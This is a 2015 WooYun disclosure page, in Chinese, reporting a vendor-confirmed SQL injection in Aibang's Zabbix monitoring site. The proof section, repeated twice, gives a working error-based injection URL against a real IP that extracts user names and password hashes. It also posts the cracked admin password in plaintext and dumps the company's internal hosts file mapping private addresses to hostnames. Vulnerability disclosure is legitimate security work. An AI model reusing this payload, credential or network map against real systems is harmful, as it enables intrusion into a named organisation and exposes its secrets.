当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164825

漏洞标题:爱帮网某站SQL注入可导致内网探测

相关厂商:爱帮网

漏洞作者: _Thorns

提交时间:2015-12-26 09:48

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-26: 细节已通知厂商并且等待厂商处理中
2015-12-28: 厂商已经确认,细节仅向厂商公开
2016-01-07: 细节向核心白帽子及相关领域专家公开
2016-01-17: 细节向普通白帽子公开
2016-01-27: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

爱帮网某站注入可导致内网渗透

详细说明:

可内网,请参考:
WooYun: 漫游爱帮网内网可控制多台服务器(多处安全隐患综合利用)
URL:http://60.28.205.210/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29

1.png


zabbix存在注入,花了1毛钱解密 。。
admin P@ssword199

1.png


Result of "wooyun"
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
60.28.205.198 mail.aibang.com mail libai
60.28.205.198 mail.aibang.com web libai
192.168.2.1 mail.aibang.com inmail libai
192.168.2.2 dufu
192.168.2.3 dumu
192.168.2.4 hanyu
192.168.2.5 wangwei
192.168.2.6 wangbo
192.168.2.8 jiadao
192.168.2.9 zhangji
192.168.2.10 yuanzhen
192.168.2.11 cuihao
192.168.2.12 wanghan
192.168.2.13 gaoshi
192.168.2.14 lulun
192.168.2.15 weizhuang
192.168.2.16 censhen
192.168.2.17 changjian
192.168.2.18 mengjiao
192.168.2.19 zhangxu
192.168.2.20 lishangyin
192.168.2.21 baijuyi
192.168.2.22 liuzongyuan
192.168.2.23 menghaoran
192.168.2.24 luobinwang
192.168.2.25 wangchangling
192.168.2.26 hezhizhang
192.168.2.27 chenziang
192.168.2.28 liuyuxi
192.168.2.29 wentingyun
192.168.2.30 songzhiwen
192.168.2.31 wangzhihuan
192.168.2.32 weiyingwu
192.168.2.33 zhangjiuling
192.168.2.34 liuchangqing
192.168.2.35 zhuxi
192.168.2.36 taoyuanming
192.168.2.37 liuyong
192.168.2.38 luyou
192.168.2.39 yanshu
192.168.2.40 jiangkui
192.168.2.41 ouyangxiu
192.168.2.42 suxun
192.168.2.43 suzhe
192.168.2.44 zengkong
192.168.2.45 shenkuo
192.168.2.46 fanzhongyan
192.168.2.47 wentianxiang
192.168.2.48 xinqiji
192.168.2.49 guanhanqing
192.168.2.50 wangshipu
192.168.2.51 zhangyanghao
192.168.2.66 suweidao
192.168.2.68 liduan
192.168.2.61 zhubajie
192.168.2.64 shaseng
192.168.2.93 liubei
192.168.2.94 zhugeliang
192.168.2.95 sunquan
192.168.2.96 caocao
192.168.2.100 sushi
192.168.2.101 liqingzhao
192.168.2.102 wanganshi
192.168.2.103 liyu
192.168.2.104 lijing
192.168.2.75 Amail
192.168.2.76 Bmail
192.168.2.77 Cmail
192.168.2.78 Dmail
192.168.2.79 Email
192.168.2.80 Fmail
192.168.2.81 Gmail
192.168.2.82 Hmail
192.168.2.83 Imail
192.168.2.84 Jmail
192.168.2.85 Kmail
192.168.2.86 Lmail
192.168.2.87 Mmail
192.168.2.88 Nmail
192.168.2.89 Omail
192.168.2.90 Pmail
192.168.2.200 qmail
192.168.2.201 rmail
192.168.2.202 smail
192.168.2.203 tmail
192.168.2.204 umail
192.168.2.205 vmail
192.168.2.206 wmail
192.168.2.207 xmail
192.168.2.208 ymail
192.168.2.209 zmail
192.168.2.210 0mail
192.168.2.211 1mail
192.168.2.212 2mail
192.168.2.213 3mail
192.168.2.214 4mail
192.168.2.215 5mail
192.168.2.216 6mail
192.168.2.217 7mail
192.168.2.218 8mail
192.168.2.219 9mail
192.168.2.220 10mail
192.168.2.221 11mail
192.168.2.222 12mail
192.168.2.223 13mail
192.168.2.224 14mail
192.168.2.225 15mail
192.168.2.226 16mail
60.28.211.171 liuyuxi
218.241.181.5 mail.hollycrm.com
58.211.82.9 www.hnticai.com

漏洞证明:

可内网,请参考:
WooYun: 漫游爱帮网内网可控制多台服务器(多处安全隐患综合利用)
URL:http://60.28.205.210/zabbix/httpmon.php?applications=2%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%28select%20concat%28cast%28concat%28alias,0x7e,passwd,0x7e%29%20as%20char%29,0x7e%29%29%20from%20zabbix.users%20LIMIT%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29

1.png


zabbix存在注入,花了1毛钱解密 。。
admin P@ssword199

1.png


Result of "wooyun"
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
60.28.205.198 mail.aibang.com mail libai
60.28.205.198 mail.aibang.com web libai
192.168.2.1 mail.aibang.com inmail libai
192.168.2.2 dufu
192.168.2.3 dumu
192.168.2.4 hanyu
192.168.2.5 wangwei
192.168.2.6 wangbo
192.168.2.8 jiadao
192.168.2.9 zhangji
192.168.2.10 yuanzhen
192.168.2.11 cuihao
192.168.2.12 wanghan
192.168.2.13 gaoshi
192.168.2.14 lulun
192.168.2.15 weizhuang
192.168.2.16 censhen
192.168.2.17 changjian
192.168.2.18 mengjiao
192.168.2.19 zhangxu
192.168.2.20 lishangyin
192.168.2.21 baijuyi
192.168.2.22 liuzongyuan
192.168.2.23 menghaoran
192.168.2.24 luobinwang
192.168.2.25 wangchangling
192.168.2.26 hezhizhang
192.168.2.27 chenziang
192.168.2.28 liuyuxi
192.168.2.29 wentingyun
192.168.2.30 songzhiwen
192.168.2.31 wangzhihuan
192.168.2.32 weiyingwu
192.168.2.33 zhangjiuling
192.168.2.34 liuchangqing
192.168.2.35 zhuxi
192.168.2.36 taoyuanming
192.168.2.37 liuyong
192.168.2.38 luyou
192.168.2.39 yanshu
192.168.2.40 jiangkui
192.168.2.41 ouyangxiu
192.168.2.42 suxun
192.168.2.43 suzhe
192.168.2.44 zengkong
192.168.2.45 shenkuo
192.168.2.46 fanzhongyan
192.168.2.47 wentianxiang
192.168.2.48 xinqiji
192.168.2.49 guanhanqing
192.168.2.50 wangshipu
192.168.2.51 zhangyanghao
192.168.2.66 suweidao
192.168.2.68 liduan
192.168.2.61 zhubajie
192.168.2.64 shaseng
192.168.2.93 liubei
192.168.2.94 zhugeliang
192.168.2.95 sunquan
192.168.2.96 caocao
192.168.2.100 sushi
192.168.2.101 liqingzhao
192.168.2.102 wanganshi
192.168.2.103 liyu
192.168.2.104 lijing
192.168.2.75 Amail
192.168.2.76 Bmail
192.168.2.77 Cmail
192.168.2.78 Dmail
192.168.2.79 Email
192.168.2.80 Fmail
192.168.2.81 Gmail
192.168.2.82 Hmail
192.168.2.83 Imail
192.168.2.84 Jmail
192.168.2.85 Kmail
192.168.2.86 Lmail
192.168.2.87 Mmail
192.168.2.88 Nmail
192.168.2.89 Omail
192.168.2.90 Pmail
192.168.2.200 qmail
192.168.2.201 rmail
192.168.2.202 smail
192.168.2.203 tmail
192.168.2.204 umail
192.168.2.205 vmail
192.168.2.206 wmail
192.168.2.207 xmail
192.168.2.208 ymail
192.168.2.209 zmail
192.168.2.210 0mail
192.168.2.211 1mail
192.168.2.212 2mail
192.168.2.213 3mail
192.168.2.214 4mail
192.168.2.215 5mail
192.168.2.216 6mail
192.168.2.217 7mail
192.168.2.218 8mail
192.168.2.219 9mail
192.168.2.220 10mail
192.168.2.221 11mail
192.168.2.222 12mail
192.168.2.223 13mail
192.168.2.224 14mail
192.168.2.225 15mail
192.168.2.226 16mail
60.28.211.171 liuyuxi
218.241.181.5 mail.hollycrm.com
58.211.82.9 www.hnticai.com

修复方案:

版权声明:转载请注明来源 _Thorns@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-12-28 14:28

厂商回复:

很严重,鄙司SA的安全意识还需提高。谢谢。

最新状态:

暂无


漏洞评价:

评价